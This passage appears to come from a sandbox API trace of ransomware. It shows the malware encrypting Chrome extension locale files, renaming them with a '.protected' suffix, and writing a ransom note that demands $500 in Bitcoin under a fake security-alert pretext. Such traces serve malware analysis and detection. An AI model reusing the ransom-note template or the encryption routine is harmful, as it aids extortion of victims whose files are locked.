(lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0083.933] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0083.933] CloseHandle (hObject=0x164) returned 1 [0083.933] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0083.933] lstrcmpiW (lpString1="ro", lpString2="Windows") returned -1 [0083.933] lstrcmpiW (lpString1="ro", lpString2="Program Files") returned 1 [0083.933] lstrcmpiW (lpString1="ro", lpString2="Program Files (x86)") returned 1 [0083.933] lstrcmpiW (lpString1="ro", lpString2="$Recycle.bin") returned 1 [0083.933] lstrcmpiW (lpString1="ro", lpString2="System Volume Information") returned -1 [0083.933] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ro") returned 150 [0083.933] lstrcmpW (lpString1="ro", lpString2=".") returned 1 [0083.933] lstrcmpW (lpString1="ro", lpString2="..") returned 1 [0083.933] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ro\\*") returned 152 [0083.933] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ro\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0083.934] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0083.934] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0083.934] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0083.934] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0083.934] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0083.934] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ro\\.") returned 152 [0083.934] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0083.934] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0083.934] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0083.934] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0083.934] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0083.934] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0083.934] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0083.934] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ro\\..") returned 153 [0083.934] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0083.934] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0083.934] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0083.934] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0083.934] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0083.934] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0083.934] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0083.934] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0083.934] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ro\\messages.json") returned 164 [0083.934] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0083.934] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0083.934] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0083.934] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0083.934] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ro\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ro\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0083.935] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ro\\messages.json") returned 164 [0083.935] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0083.935] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ro\\messages.json") returned 164 [0083.935] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0083.935] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ro\\messages.json") returned 164 [0083.935] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0083.935] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x2800, lpOverlapped=0x0) returned 1 [0083.937] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0083.937] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x2800, lpOverlapped=0x0) returned 1 [0083.937] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.937] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0083.937] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0083.937] CloseHandle (hObject=0x168) returned 1 [0083.937] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ro\\messages.json.protected") returned 174 [0083.937] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ro\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ro\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ro\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ro\\messages.json.protected")) returned 1 [0083.938] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0083.938] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0083.938] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ro\\RESTORE_FILES.txt") returned 168 [0083.938] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ro\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ro\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0083.939] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0083.939] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0083.939] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0083.939] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0083.939] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0083.939] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0083.939] CloseHandle (hObject=0x164) returned 1 [0083.940] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0083.940] lstrcmpiW (lpString1="ru", lpString2="Windows") returned -1 [0083.940] lstrcmpiW (lpString1="ru", lpString2="Program Files") returned 1 [0083.940] lstrcmpiW (lpString1="ru", lpString2="Program Files (x86)") returned 1 [0083.940] lstrcmpiW (lpString1="ru", lpString2="$Recycle.bin") returned 1 [0083.940] lstrcmpiW (lpString1="ru", lpString2="System Volume Information") returned -1 [0083.940] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ru") returned 150 [0083.940] lstrcmpW (lpString1="ru", lpString2=".") returned 1 [0083.940] lstrcmpW (lpString1="ru", lpString2="..") returned 1 [0083.940] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ru\\*") returned 152 [0083.940] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ru\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0083.940] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0083.940] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0083.940] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0083.940] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0083.940] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0083.940] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ru\\.") returned 152 [0083.940] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0083.940] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0083.940] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0083.940] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0083.940] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0083.940] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0083.940] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0083.940] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ru\\..") returned 153 [0083.940] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0083.940] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0083.940] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0083.940] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0083.940] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0083.940] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0083.940] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0083.940] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0083.940] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ru\\messages.json") returned 164 [0083.941] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0083.941] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0083.941] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0083.941] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0083.941] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ru\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ru\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0083.941] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ru\\messages.json") returned 164 [0083.941] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0083.941] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ru\\messages.json") returned 164 [0083.941] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0083.941] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ru\\messages.json") returned 164 [0083.942] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0083.942] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x2800, lpOverlapped=0x0) returned 1 [0083.943] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0083.943] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x2800, lpOverlapped=0x0) returned 1 [0083.943] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.943] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0083.943] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0083.943] CloseHandle (hObject=0x168) returned 1 [0083.943] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ru\\messages.json.protected") returned 174 [0083.943] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ru\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ru\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ru\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ru\\messages.json.protected")) returned 1 [0083.944] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0083.944] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0083.944] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ru\\RESTORE_FILES.txt") returned 168 [0083.944] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ru\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ru\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0083.944] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0083.944] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0083.945] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0083.945] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0083.945] 